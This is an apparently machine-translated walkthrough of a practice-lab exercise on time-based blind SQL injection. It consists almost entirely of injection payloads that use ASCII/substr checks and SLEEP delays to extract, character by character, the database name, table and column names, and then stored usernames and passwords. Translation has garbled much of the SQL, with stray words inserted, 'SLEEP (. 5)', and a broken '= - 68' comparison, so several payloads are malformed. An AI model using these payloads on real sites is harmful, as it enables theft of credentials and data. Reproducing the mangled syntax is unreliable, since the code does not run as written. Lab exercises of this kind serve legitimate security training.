Less-9 Get - Blind -Time based -Single Quotes
The original page
based on the time of the blinds
directly back if it is correct, the wrong time to wait for 5 seconds.
1. Database guess:
? = ID. 1 'and the If (ASCII (substr (Database (), 1,1)) = 115,1, SLEEP (. 5)) - +
? = ID. 1' and the If (ASCII (substr ( database (), 1,1)) = 114,1, sleep (5)) - + 
described first is S (ASCII code 115)
? id = 1'and If (ascii ( substr (database (), 2,1)) = 101,1, sleep (5)) - + 
Description second is e (ascii code is 101)
... and so on, get the name of the database security
2. speculation data security database table:
? The above mentioned id = 1'and the If (ASCII (substr ((information_schema.tables the WHERE from the SELECT table_name table_schema = 'security' limit 0, 1), 1, 1)) = 101, 1, sleep (5)) - +
? id = 1'and If (ascii ( substr ((select table_name from information_schema.tables where table_schema = 'security' limit 0,1), 1,1)) = 100,1, sleep (5)) - + 
Description of the first table is a data e, ... and so on, to get emails
? ID = 1'and the If (ASCII (substr ((SELECT from table_name WHERE information_schema.tables TABLE_SCHEMA = 'Security' limit 1,1), 1,1)) = 114,1, SLEEP (. 5)) - +
(Analyzing steps above)
after several attempts to get all the data sheets emails, referers, uagents, users
3. guessing users column of the table:
? The above mentioned id = 1'and the If (ASCII (substr ((information_schema.columns the WHERE from the SELECT column_name table_name = 'users' limit 0, 1), 1, 1)) = 105,1, SLEEP (5)) - +
(supra determination step)
several attempts, the column name is id, username, password
4. The value of the guess username:
? ID = 1'and the If (ASCII (substr ((SELECT username from Users limit 0,1), 1,1)) = - 68 and, SLEEP (. 5)) - +
(decision step Ibid.)
several attempts to get all the user names and passwords
